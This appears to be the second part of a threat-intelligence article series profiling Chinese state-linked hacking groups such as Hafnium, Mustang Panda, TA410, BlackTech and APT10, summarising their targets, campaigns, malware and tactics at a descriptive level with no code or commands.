The second part of a series provides an overview of the most prolific state-backed hacker groups associated with China, including their goals, targets, and Tactics, Techniques, and Procedures (TTPs).
Hafnium
Hafnium is primarily focused on entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and nongovernmental organizations (NGOs). The group made headlines in 2021 after a widespread hacking campaign involving a set of four zero-day vulnerabilities affecting on-premises Microsoft Exchange Servers. These flaws allowed hackers to gain access to user emails and passwords on affected servers, administrator privileges on the server, as well as access connected devices on the same network. The campaign affected tens of thousands of on-premises email customers, small businesses, enterprises and government organizations worldwide.
First attacks were observed in January 2021 by cybersecurity company Volexity, when it discovered suspicious activity from two of its customers’ Microsoft Exchange servers. In March, Microsoft released security updates to address the bugs. Several months later, the US and several allies publicly accused hackers affiliated with the Chinese government for the Microsoft Exchange Server hack.
The Hafnium APT has also been observed exploiting the Log4Shell vulnerability (CVE-2021-44228) in Apache’s Log4j logging utility. The disclosure of the flaw caused a widespread alarm because Log4j is widely used in commonly deployed enterprise systems.
Hafnium has been seen compromising victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once compromising a victim network, Hafnium typically exfiltrates data to file sharing sites like MEGA.
Mustang Panda
Mustang Panda (also tracked as RedDelta, TA416, or Bronze President) is believed to be a China-based advanced persistent threat (APT) group that has been conducting cyber-espionage operations since at least 2014. The group has a history of targeting various NGOs, government entities, religious, and other non-governmental organizations in the US, Germany, Mongolia, Myanmar, Pakistan, and Vietnam, and countries within the Southeast Asian region.
As for the attack vectors, Mustang Panda typically relies on phishing techniques in order to gain access to target’s network. The phishing emails involve legitimate-looking documents written in target’s native language and centered around themes of interest to a potential victim. These decoy documents contain a .zip archive, which, when opened, executes a malicious loader leading to the installation of the PlugX or Poison Ivy malware or a Cobalt Strike Beacon.
Mustang Panda is believed to be behind a 2020 cyber-espionage campaign targeting a number of organizations related to the Catholic Church. According to researchers at Recorded Future, this activity was likely connected to the renewal of an agreement between the Vatican and the CCP and was aimed at gathering intel related to upcoming negotiations.
Mustang Panda was also linked to a cyber-esionage operation, known as “Operation Diànxùn”, targeting telecommunication companies based in Southeast Asia, Europe, and the US. The researchers believe that the goal of the operation was to obtain information pertaining to 5G technology, and it was likely motivated by the ban on the use of Chinese technology in 5G rollouts in several countries.
The group is also believed to be responsible for a breach of at least ten Indonesian government ministries and agencies, including Indonesia’s primary intelligence service, the Badan Intelijen Negara (BIN) in April 2021.
TA410
This APT group has been linked to an attack against US utility providers between July and November 2019. In June 2020, security firm Proofpoint released a report detailing a new malware family named “FlowCloud”, which was used in attacks on entities in US’ utilities sector.
The malware has remote access trojan (RAT) functionality that provides complete control over a compromised system, including access to installed applications, keyboard, mouse, screen, files, services and processes; and the ability to exfiltrate information via command and control server.
FlowCloud was deployed at the same time as the “LookBack” malware, which was also used to target US utility companies, and Proofpoint believes that both LookBack and FlowCloud can be the work of a single threat actor, TA410.
BlackTech
BlackTech (Circuit Panda, Temp.Overboard, Huapi, Palmerworm), is a cyber-espionage group, which has been active since 2012. The threat actors’ targets primarily include entities (government agencies and private organizations) in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. According to researchers, BlackTech’s goal is likely to steal their targets’ technology.
Over the past few years, the group has been linked by researchers to several malicious operations, including a campaign in which attackers took advantage of ASUS WebStorage to deliver a backdoor, and a large-scale cyber attack against Japanese electronics and electrical equipment manufacturing company Mitsubishi Electric Corp.
Since 2018, researchers have observed the adversary developing new tools, including the Consock malware discovered in 2018, the Waterbear loader found in 2020 and various ELF variants of the TSCookie malware.
BlackTech often utilizes legitimate software tools and processes to achieve their goals, using stolen digital certificates and API hooking among other techniques. The group’s arsenal includes a variety of malware (such as Plead and BTSDoor backdoors, the TSCookie malware, the Flagpro downloader, and the DRIGO exfiltration tool) and techniques like spear-phishing emails, DLL side loading, and the exploitation of RCE vulnerabilities in Microsoft Office (CVE-2012-0158, CVE-2014-6352, CVE-2017-0199).
APT10
APT10 (aka TA429, Menupass, Red Apollo, Stone Panda, Cicada) is a prolific state-sponsored hacker group with alleged ties to the Chinese government. Active since at least 2006, the group is focused on targeting telecommunications, defense, construction, engineering, aerospace, and government sectors in the US, Europe, and Japan likely with goals of conducting commercial and economic cyber-espionage.
Like many APT groups, the threat actor relies on spear-phishing to gain initial foothold on victim’s network. The actor then uses a combination of publicly available and custom tools shared among Chinese APTs (such as quasi-legitimate remote access tool Quasar and Poison Ivy and PlugX malware) to establish persistence and move laterally within targets’ networks.
APT10 is believed to be behind an operation dubbed “Operation Cloud Hopper” in 2017, which targeted IT managed service providers (MSPs) in order to gain access to customers’ networks.
In 2018, the US Department of Justice charged two alleged members of APT10 for their role in global hacking campaigns targeting, among other data, intellectual property and confidential business and technological information at managed service providers.
Over the past few years, APT10 had been linked by researchers to several cyber-espionage campaigns, including Operation Soft Cell, in which the threat actor compromised at least ten telecommunications or cellular providers across the globe. The attack was aiming to obtain Call Detail Records containing metadata regarding individual mobile subscribers including information such as device identifiers, locations, and call history.
In the most recent campaign, which came to light in February 2022, the threat actor has been observed targeting Taiwan’s financial sector using a vulnerability in a security software solution used by around 80% of all local financial organizations. The campaign, dubbed “Operation Cache Panda,” by Taiwanese security company CyCraft, has been going on since November 2021. During the attacks, the threat actors took advantage of a vulnerability in the web interface of a security software, deployed a version of the ASPXCSharp web shell, and then used a tool called “Impacket” to scan victim’s internal network.